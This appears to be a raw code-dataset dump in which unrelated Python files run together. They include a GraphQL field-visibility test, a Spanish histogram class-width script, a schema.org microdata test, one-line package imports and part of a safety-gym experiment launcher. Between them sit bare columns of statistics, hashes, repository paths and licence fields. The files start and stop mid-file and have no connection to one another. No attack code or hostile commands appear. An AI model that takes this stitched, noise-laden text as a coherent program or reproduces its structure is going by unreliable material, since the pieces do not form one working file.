mocker.patch("voting.models.ranking.get_users_data_by_ids", return_value={})
submission = _submission(submission_factory, user=user, conference=conference)
rank_request_factory(
conference=conference, submissions=[submission], is_public=False
)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ❌ restricted
assert data["submission"]["elevatorPitch"] is None
assert data["submission"]["abstract"] is None
assert data["submission"]["topic"] is None
assert data["submission"]["type"] is None
assert data["submission"]["duration"] is None
assert data["submission"]["audienceLevel"] is None
assert data["submission"]["languages"] is None
assert data["submission"]["tags"] is None
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
def test_ranking_does_not_exists_cannot_see_restricted_and_private_fields(
graphql_client,
conference_factory,
user,
submission_factory,
):
conference = conference_factory(rankrequest=None)
submission = _submission(submission_factory, user=user, conference=conference)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ❌ restricted
assert data["submission"]["elevatorPitch"] is None
assert data["submission"]["abstract"] is None
assert data["submission"]["topic"] is None
assert data["submission"]["type"] is None
assert data["submission"]["duration"] is None
assert data["submission"]["audienceLevel"] is None
assert data["submission"]["languages"] is None
assert data["submission"]["tags"] is None
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
| 33.939698
| 88
| 0.663607
| 1,427
| 13,508
| 6.153469
| 0.075683
| 0.148047
| 0.296094
| 0.092928
| 0.895228
| 0.890104
| 0.882246
| 0.877463
| 0.845462
| 0.844551
| 0
| 0
| 0.192256
| 13,508
| 397
| 89
| 34.025189
| 0.800477
| 0.024874
| 0
| 0.694915
| 0
| 0
| 0.266494
| 0.01522
| 0
| 0
| 0
| 0
| 0.450847
| 1
| 0.044068
| false
| 0
| 0.00678
| 0.00678
| 0.061017
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2a6be5ba8f66ba0a2032e6dad6d1aa1cc04e1229
| 2,323
|
py
|
Python
|
Curso estadistica descriptiva/tests/agrupacion de datos cuantitativos/adc.py
|
DarkShadow4/python
|
4cd94e0cf53ee06c9c31e9272572ca9656697c30
|
[
"MIT"
] | null | null | null |
Curso estadistica descriptiva/tests/agrupacion de datos cuantitativos/adc.py
|
DarkShadow4/python
|
4cd94e0cf53ee06c9c31e9272572ca9656697c30
|
[
"MIT"
] | null | null | null |
Curso estadistica descriptiva/tests/agrupacion de datos cuantitativos/adc.py
|
DarkShadow4/python
|
4cd94e0cf53ee06c9c31e9272572ca9656697c30
|
[
"MIT"
] | 1
|
2020-08-19T17:25:22.000Z
|
2020-08-19T17:25:22.000Z
|
# Regla de Scott
import pandas as pd
import numpy as np
import math
crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ")
cw = crabs.width
n = len(cw)
precision = 0.1
# Número de clases
As = 3.5*np.std(cw)*n**(-1/3)
Ks = math.ceil((max(cw)-min(cw))/As)
# Amplitud de clases (precisión a décimas)
A = round((max(cw)-min(cw))/Ks, 1) + precision
# Establecer limites de intervalos
L1 = min(cw)-1/2*precision
L = [L1]
for lim in range(Ks+1):
L.append(round(L1+A*(lim+1), 2))
L
X = []
for lim in range(len(L)-2):
X.append(round((L[lim]+L[lim+1])/2, 1))
X
# Regla de la raíz
import pandas as pd
import numpy as np
import math
crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ")
cw = crabs.width
n = len(cw)
precision = 0.1
# Número de clases
Kr = math.ceil(math.sqrt(n))
# Amplitud de clases (precisión a décimas)
A = round((max(cw)-min(cw))/Kr, 1) + precision
# Establecer limites de intervalos
L1 = min(cw)-1/2*precision
L = [L1]
for lim in range(Kr+1):
L.append(round(L1+A*(lim+1), 2))
L
X = []
for lim in range(len(L)-2):
X.append(round((L[lim]+L[lim+1])/2, 1))
X
# Regla de Sturges
import pandas as pd
import numpy as np
import math
crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ")
cw = crabs.width
n = len(cw)
precision = 0.1
# Número de clases
KS = math.ceil(1+np.log2(n))
# Amplitud de clases (precisión a décimas)
A = round((max(cw)-min(cw))/KS, 1) + precision
# Establecer limites de intervalos
L1 = min(cw)-1/2*precision
L = [L1]
for lim in range(KS+1):
L.append(round(L1+A*(lim+1), 2))
L
X = []
for lim in range(len(L)-2):
X.append(round((L[lim]+L[lim+1])/2, 1))
X
# Regla de Freedman-Diaconis
import pandas as pd
import numpy as np
import math
crabs = pd.read_table("../../../../r-basic/data/datacrab.txt", sep = " ")
cw = crabs.width
n = len(cw)
precision = 0.1
# Número de clases
Afd = 2*(np.quantile(cw, 0.75)-np.quantile(cw, 0.25))*n**(-1/3)
Kfd = math.ceil((max(cw)-min(cw))/Afd)
# Amplitud de clases (precisión a décimas)
A = round((max(cw)-min(cw))/Kfd, 1) + precision
# Establecer limites de intervalos
L1 = min(cw)-1/2*precision
L = [L1]
for lim in range(Kfd+1):
L.append(round(L1+A*(lim+1), 2))
L
X = []
for lim in range(len(L)-2):
X.append(round((L[lim]+L[lim+1])/2, 1))
X
| 18.733871
| 73
| 0.629359
| 439
| 2,323
| 3.321185
| 0.148064
| 0.016461
| 0.043896
| 0.071331
| 0.899177
| 0.899177
| 0.874486
| 0.874486
| 0.874486
| 0.874486
| 0
| 0.03872
| 0.166164
| 2,323
| 123
| 74
| 18.886179
| 0.713991
| 0.18898
| 0
| 0.702703
| 0
| 0
| 0.081414
| 0.079272
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.162162
| 0
| 0.162162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa5683e54afbfd7df3f8f57d7432e8e2a1aa0c8a
| 16,236
|
py
|
Python
|
6_schema/project/tests/test_parsers/test_microdata.py
|
neel-jaris/Python-Web-Scraping-Projects
|
f77426d1351e5b5ca06aacf415388409d89277a9
|
[
"MIT"
] | 15
|
2019-03-30T02:41:55.000Z
|
2022-03-21T05:15:28.000Z
|
6_schema/project/tests/test_parsers/test_microdata.py
|
neel-jaris/Python-Web-Scraping-Projects
|
f77426d1351e5b5ca06aacf415388409d89277a9
|
[
"MIT"
] | 1
|
2021-12-02T17:32:56.000Z
|
2021-12-02T17:32:56.000Z
|
6_schema/project/tests/test_parsers/test_microdata.py
|
neel-jaris/Python-Web-Scraping-Projects
|
f77426d1351e5b5ca06aacf415388409d89277a9
|
[
"MIT"
] | 9
|
2019-12-26T19:35:04.000Z
|
2022-01-24T15:45:27.000Z
|
from schema.parsers.microdata import format_microdata
def test_microdata():
data = [
{
"type": "http://schema.org/Product",
"properties": {
"image": "https://i5.walmartimages.com/asr/ce1033ea-4934-4098-af07-16d0136689fd_1.5cebe0dbf47d95ddc489e506c8cc28f7.jpeg?odnHeight=450&odnWidth=450&odnBg=FFFFFF",
"name": [
"Dungeons & Dragons Player's Handbook (Dungeons & Dragons Core Rulebooks)",
"",
],
"sku": "37784457",
"aggregateRating": {
"type": "//schema.org/AggregateRating",
"properties": {
"ratingValue": "4.8",
"bestRating": "5",
"reviewCount": "32",
},
},
"brand": "Wizards RPG Team",
"offers": {
"type": "//schema.org/Offer",
"properties": {
"url": "/ip/Dungeons-Dragons-Player-s-Handbook-Dungeons-Dragons-Core-Rulebooks-9780786965601/37784457",
"priceValidUntil": "",
"priceCurrency": "USD",
"price": "27.11",
"availability": "//schema.org/InStock",
"itemCondition": "//schema.org/NewCondition",
"availableDeliveryMethod": "//schema.org/OnSitePickup",
"availableAtOrFrom": {
"type": "//schema.org/Place",
"properties": {
"name": "San Leandro Store",
"branchCode": "2648",
},
},
},
},
"review": [
{
"type": "http://schema.org/Review",
"properties": {
"author": {"type": "http://schema.org/Person", "value": ""}
},
},
{
"type": "http://schema.org/Review",
"properties": {
"name": "Can't believe it!! :D",
"reviewRating": {
"type": "//schema.org/Rating",
"properties": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
},
},
"reviewBody": "I've been thinking of getting the Player's Handbook for a while now, but I always felt like it was too much for me to spend.. until I found this!! It's the same book, fully licenses and hard cover, but for a fraction of the price (and it came two days early!). Believe me, I was hesitant at first, but it's the real deal. Anyways.. hope all of y'all have a great day!See more",
"author": "Liz,",
"datePublished": "February 9, 2019",
},
},
{
"type": "http://schema.org/Review",
"properties": {
"name": "Hardcore Hard Cover Awesome!",
"reviewRating": {
"type": "//schema.org/Rating",
"properties": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
},
},
"reviewBody": "The purchase experience was easy. Found exactly what I was looking for online and the free in store pick up was a breeze! The book itself is awesome! The art is GORGEOUS and the details are easy to understand. The book is pretty heavy though so I wouldn't suggest dropping it on your foot. Speaking from experience. Giggle.See more",
"author": "AskinYoheC,",
"datePublished": "March 1, 2017",
},
},
{
"type": "http://schema.org/Review",
"properties": {
"name": "New Edition of Player Rules.",
"reviewRating": {
"type": "//schema.org/Rating",
"properties": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
},
},
"reviewBody": "Adds some new races and a new class. Great advantage/disadvantage feature. Same ole' D&D but better. Highly recommend for the newbie or veteran. NEEDED TO PLAY THE GAME EFFECTIVELYSee more",
"author": "zngraceland,",
"datePublished": "October 7, 2014",
},
},
{
"type": "http://schema.org/Review",
"properties": {
"name": "Exactly what I expected!",
"reviewRating": {
"type": "//schema.org/Rating",
"properties": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
},
},
"reviewBody": "It was shipped much quicker than I thought it would be and the product was exactly what I thought it would be!See more",
"author": "hbg6044,",
"datePublished": "October 26, 2014",
},
},
{
"type": "http://schema.org/Review",
"properties": {
"name": "Perfect condition",
"reviewRating": {
"type": "//schema.org/Rating",
"properties": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
},
},
"reviewBody": "Arrived well-packed and sooner than expectedSee more",
"author": "DnD4U,",
"datePublished": "September 13, 2016",
},
},
],
"description": "Hardback: Dungeons & Dragons Player's Handbook (Dungeons & Dragons Core Rulebooks)",
},
},
{
"type": "//schema.org/BreadcrumbList",
"properties": {
"itemListElement": [
{
"type": "//schema.org/ListItem",
"properties": {
"item": {
"type": "//schema.org/Thing",
"id": "//www.walmart.com/cp/3920",
"properties": {"name": "Books"},
},
"position": "1",
},
},
{
"type": "//schema.org/ListItem",
"properties": {
"item": {
"type": "//schema.org/Thing",
"id": "//www.walmart.com/cp/582361",
"properties": {"name": "Crafts & Hobbies Books"},
},
"position": "2",
},
},
{
"type": "//schema.org/ListItem",
"properties": {
"item": {
"type": "//schema.org/Thing",
"id": "//www.walmart.com/cp/9999446",
"properties": {"name": "Game & Activity Books"},
},
"position": "3",
},
},
{
"type": "//schema.org/ListItem",
"properties": {
"item": {
"type": "//schema.org/Thing",
"id": "//www.walmart.com/cp/4085188",
"properties": {"name": "Role Playing & Fantasy Books"},
},
"position": "4",
},
},
]
},
},
]
expected = [
{
"image": "https://i5.walmartimages.com/asr/ce1033ea-4934-4098-af07-16d0136689fd_1.5cebe0dbf47d95ddc489e506c8cc28f7.jpeg?odnHeight=450&odnWidth=450&odnBg=FFFFFF",
"name": [
"Dungeons & Dragons Player's Handbook (Dungeons & Dragons Core Rulebooks)",
"",
],
"sku": "37784457",
"aggregateRating": {
"ratingValue": "4.8",
"bestRating": "5",
"reviewCount": "32",
"type": "//schema.org/AggregateRating",
},
"brand": "Wizards RPG Team",
"offers": {
"url": "/ip/Dungeons-Dragons-Player-s-Handbook-Dungeons-Dragons-Core-Rulebooks-9780786965601/37784457",
"priceValidUntil": "",
"priceCurrency": "USD",
"price": "27.11",
"availability": "//schema.org/InStock",
"itemCondition": "//schema.org/NewCondition",
"availableDeliveryMethod": "//schema.org/OnSitePickup",
"availableAtOrFrom": {
"name": "San Leandro Store",
"branchCode": "2648",
"type": "//schema.org/Place",
},
"type": "//schema.org/Offer",
},
"review": [
{
"author": {"type": "http://schema.org/Person", "value": ""},
"type": "http://schema.org/Review",
},
{
"name": "Can't believe it!! :D",
"reviewRating": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
"type": "//schema.org/Rating",
},
"reviewBody": "I've been thinking of getting the Player's Handbook for a while now, but I always felt like it was too much for me to spend.. until I found this!! It's the same book, fully licenses and hard cover, but for a fraction of the price (and it came two days early!). Believe me, I was hesitant at first, but it's the real deal. Anyways.. hope all of y'all have a great day!See more",
"author": "Liz,",
"datePublished": "February 9, 2019",
"type": "http://schema.org/Review",
},
{
"name": "Hardcore Hard Cover Awesome!",
"reviewRating": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
"type": "//schema.org/Rating",
},
"reviewBody": "The purchase experience was easy. Found exactly what I was looking for online and the free in store pick up was a breeze! The book itself is awesome! The art is GORGEOUS and the details are easy to understand. The book is pretty heavy though so I wouldn't suggest dropping it on your foot. Speaking from experience. Giggle.See more",
"author": "AskinYoheC,",
"datePublished": "March 1, 2017",
"type": "http://schema.org/Review",
},
{
"name": "New Edition of Player Rules.",
"reviewRating": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
"type": "//schema.org/Rating",
},
"reviewBody": "Adds some new races and a new class. Great advantage/disadvantage feature. Same ole' D&D but better. Highly recommend for the newbie or veteran. NEEDED TO PLAY THE GAME EFFECTIVELYSee more",
"author": "zngraceland,",
"datePublished": "October 7, 2014",
"type": "http://schema.org/Review",
},
{
"name": "Exactly what I expected!",
"reviewRating": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
"type": "//schema.org/Rating",
},
"reviewBody": "It was shipped much quicker than I thought it would be and the product was exactly what I thought it would be!See more",
"author": "hbg6044,",
"datePublished": "October 26, 2014",
"type": "http://schema.org/Review",
},
{
"name": "Perfect condition",
"reviewRating": {
"worstRating": "1",
"ratingValue": "5",
"bestRating": "5",
"type": "//schema.org/Rating",
},
"reviewBody": "Arrived well-packed and sooner than expectedSee more",
"author": "DnD4U,",
"datePublished": "September 13, 2016",
"type": "http://schema.org/Review",
},
],
"description": "Hardback: Dungeons & Dragons Player's Handbook (Dungeons & Dragons Core Rulebooks)",
"type": "http://schema.org/Product",
},
{
"//schema.org/BreadcrumbList": [
{
"item": {"name": "Books", "type": "//schema.org/Thing"},
"position": "1",
"type": "//schema.org/ListItem",
},
{
"item": {
"name": "Crafts & Hobbies Books",
"type": "//schema.org/Thing",
},
"position": "2",
"type": "//schema.org/ListItem",
},
{
"item": {
"name": "Game & Activity Books",
"type": "//schema.org/Thing",
},
"position": "3",
"type": "//schema.org/ListItem",
},
{
"item": {
"name": "Role Playing & Fantasy Books",
"type": "//schema.org/Thing",
},
"position": "4",
"type": "//schema.org/ListItem",
},
]
},
]
for i, d in enumerate(data):
assert format_microdata(d) == expected[i]
if __name__ == "__main__":
test_microdata()
| 48.465672
| 420
| 0.370658
| 1,143
| 16,236
| 5.252843
| 0.225722
| 0.083944
| 0.071452
| 0.045303
| 0.898068
| 0.871086
| 0.799134
| 0.764823
| 0.76016
| 0.76016
| 0
| 0.038153
| 0.509239
| 16,236
| 334
| 421
| 48.610778
| 0.715361
| 0
| 0
| 0.636364
| 0
| 0.036364
| 0.420485
| 0.046933
| 0
| 0
| 0
| 0
| 0.00303
| 1
| 0.00303
| false
| 0
| 0.00303
| 0
| 0.006061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aaab047b4aca516dd8a43d9877a26b331c4c27e9
| 86
|
py
|
Python
|
radar_qcchecks/__init__.py
|
vlouf/radar-qcchecks
|
1a81660324623ad025d1ca405ed70f0a8a32cad6
|
[
"MIT"
] | null | null | null |
radar_qcchecks/__init__.py
|
vlouf/radar-qcchecks
|
1a81660324623ad025d1ca405ed70f0a8a32cad6
|
[
"MIT"
] | null | null | null |
radar_qcchecks/__init__.py
|
vlouf/radar-qcchecks
|
1a81660324623ad025d1ca405ed70f0a8a32cad6
|
[
"MIT"
] | null | null | null |
from .radar_qcchecks import qccheck_radar_odim
from .radar_qcchecks import NoRainError
| 43
| 46
| 0.895349
| 12
| 86
| 6.083333
| 0.583333
| 0.246575
| 0.465753
| 0.630137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081395
| 86
| 2
| 47
| 43
| 0.924051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
aaae008fc8d67e5ece4541f5cccfad5e929032fa
| 165
|
py
|
Python
|
CenterNet/__init__.py
|
NichaA/CenterNet-pytorch-lightning
|
b9d38e5de6bf69ebf780501ae3002018f35585e5
|
[
"Apache-2.0"
] | 43
|
2021-02-26T15:04:42.000Z
|
2022-03-22T03:02:16.000Z
|
CenterNet/__init__.py
|
NichaA/CenterNet-pytorch-lightning
|
b9d38e5de6bf69ebf780501ae3002018f35585e5
|
[
"Apache-2.0"
] | 31
|
2021-03-05T07:53:15.000Z
|
2022-03-31T02:07:41.000Z
|
CenterNet/__init__.py
|
NichaA/CenterNet-pytorch-lightning
|
b9d38e5de6bf69ebf780501ae3002018f35585e5
|
[
"Apache-2.0"
] | 5
|
2021-04-18T16:51:56.000Z
|
2022-01-09T21:46:51.000Z
|
from CenterNet.centernet import CenterNet
from CenterNet.centernet_detection import CenterNetDetection
from CenterNet.centernet_multi_pose import CenterNetMultiPose
| 41.25
| 61
| 0.909091
| 18
| 165
| 8.166667
| 0.444444
| 0.265306
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 165
| 3
| 62
| 55
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aab50ec352bbe3507baeb073df885917fe5651df
| 156
|
py
|
Python
|
src/kw_notebook_core/bokeh.py
|
wakita/kw_notebook_core
|
1acbe074f3610ab0308ee7b56db1efe92553129d
|
[
"MIT"
] | null | null | null |
src/kw_notebook_core/bokeh.py
|
wakita/kw_notebook_core
|
1acbe074f3610ab0308ee7b56db1efe92553129d
|
[
"MIT"
] | null | null | null |
src/kw_notebook_core/bokeh.py
|
wakita/kw_notebook_core
|
1acbe074f3610ab0308ee7b56db1efe92553129d
|
[
"MIT"
] | null | null | null |
def initialize():
from bokeh.plotting import output_notebook, show, figure
from bokeh.models import *
from bokeh.layouts import *
output_notebook()
| 26
| 58
| 0.762821
| 20
| 156
| 5.85
| 0.6
| 0.230769
| 0.34188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160256
| 156
| 5
| 59
| 31.2
| 0.89313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aabb63f354657bb24ae7801957a1e6495b53531a
| 25
|
py
|
Python
|
src/hx711_multi/__init__.py
|
ASU-CS-Research/hx711-multi
|
72db6c66b408896833c14748776c505bc516c26f
|
[
"MIT"
] | null | null | null |
src/hx711_multi/__init__.py
|
ASU-CS-Research/hx711-multi
|
72db6c66b408896833c14748776c505bc516c26f
|
[
"MIT"
] | null | null | null |
src/hx711_multi/__init__.py
|
ASU-CS-Research/hx711-multi
|
72db6c66b408896833c14748776c505bc516c26f
|
[
"MIT"
] | null | null | null |
from .hx711 import HX711
| 12.5
| 24
| 0.8
| 4
| 25
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 0.16
| 25
| 1
| 25
| 25
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
630d486f169774544ec942266bea50f07094a733
| 123
|
py
|
Python
|
moviemaker3/stacks/__init__.py
|
friedrichromstedt/moviemaker3
|
7941a06d43bbbb63e45496044040a163ab97d78d
|
[
"MIT"
] | 1
|
2018-12-30T18:40:07.000Z
|
2018-12-30T18:40:07.000Z
|
moviemaker3/stacks/__init__.py
|
friedrichromstedt/moviemaker3
|
7941a06d43bbbb63e45496044040a163ab97d78d
|
[
"MIT"
] | null | null | null |
moviemaker3/stacks/__init__.py
|
friedrichromstedt/moviemaker3
|
7941a06d43bbbb63e45496044040a163ab97d78d
|
[
"MIT"
] | null | null | null |
from moviemaker3.stacks.additive import *
from moviemaker3.stacks.alpha import *
from moviemaker3.stacks.weighted import *
| 30.75
| 41
| 0.829268
| 15
| 123
| 6.8
| 0.466667
| 0.441176
| 0.617647
| 0.529412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0.097561
| 123
| 3
| 42
| 41
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
630d50342a797675a7e3bd7eef06e31542c2d4bf
| 34,912
|
py
|
Python
|
safety_gym/algo/safety-starter-agents/scripts/experiment.py
|
intelligent-control-lab/Model-free-Safe-Controlfor-Zero-Violation-Reinforcement-Learning
|
fe5aadbef719e572bb36f64b6ab95ec24b5aed9a
|
[
"MIT"
] | 2
|
2022-03-15T20:29:05.000Z
|
2022-03-31T03:59:22.000Z
|
safety_gym/algo/safety-starter-agents/scripts/experiment.py
|
intelligent-control-lab/Model-free-Safe-Controlfor-Zero-Violation-Reinforcement-Learning
|
fe5aadbef719e572bb36f64b6ab95ec24b5aed9a
|
[
"MIT"
] | null | null | null |
safety_gym/algo/safety-starter-agents/scripts/experiment.py
|
intelligent-control-lab/Model-free-Safe-Controlfor-Zero-Violation-Reinforcement-Learning
|
fe5aadbef719e572bb36f64b6ab95ec24b5aed9a
|
[
"MIT"
] | 1
|
2022-02-06T09:24:30.000Z
|
2022-02-06T09:24:30.000Z
|
#!/usr/bin/env python
import gym
import safety_gym
import safe_rl
from safe_rl.utils.run_utils import setup_logger_kwargs
from safe_rl.utils.mpi_tools import mpi_fork
from safety_gym.envs.engine import Engine
# Point
# Goal1/2 (60,2)
# Push1/2 (76,2)
# Button1/2 (76,2)
# Robot
# Goal1/2 (72,2)
# Push1/2 (88,2)
# Button1/2 (88,2)
# Doggo
# Goal1/2 (104,12)
# Push1/2 (120,12)
# Button1/2 (120,2)
def main(robot, task, algo, seed, exp_name, cpu, args):
# Verify experiment
robot_list = ['point', 'car', 'doggo']
task_list = ['mygoal1','mygoal4', "mypush1","mypush4", "mygoal1_pillars", "mygoal4_pillars",'goal1', 'goal2', 'button1', 'button2', 'push1', 'push2']
algo_list = ['ppo', 'ppo_lagrangian', 'trpo', 'trpo_lagrangian', 'cpo', 'ppo_adamba', 'trpo_adamba','ppo_adamba_sc','trpo_adamba_sc']
algo = algo.lower()
task = task.capitalize()
robot = robot.capitalize()
assert algo in algo_list, "Invalid algo"
assert task.lower() in task_list, "Invalid task"
assert robot.lower() in robot_list, "Invalid robot"
# Hyperparameters
if exp_name == None:
if "pillars" in task.lower():
if 'adamba' not in algo.lower():
if args.cpc:
raise NotImplementedError
exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + "_" + "ctrlrange-" + str(args.ctrlrange)
else:
if args.index[0:10] == 'projection':
if args.cpc:
exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
else:
exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
exp_name += "_simulation_fixed"
elif args.index == 'adaptive':
if args.cpc:
exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
else:
exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
exp_name += "_simulation_fixed"
else:
raise NotImplementedError
else:
if 'adamba' not in algo.lower():
if args.cpc:
raise NotImplementedError
exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + "_" + "ctrlrange-" + str(args.ctrlrange)
else:
if args.index[0:10] == 'projection':
if args.cpc:
exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
else:
exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
exp_name += "_simulation_fixed"
elif args.index == 'adaptive':
if args.cpc:
exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
else:
exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef)
exp_name += "_simulation_fixed"
else:
raise NotImplementedError
if robot=='Doggo':
num_steps = 1e8
steps_per_epoch = 60000
else:
num_steps = 1e7
steps_per_epoch = 30000
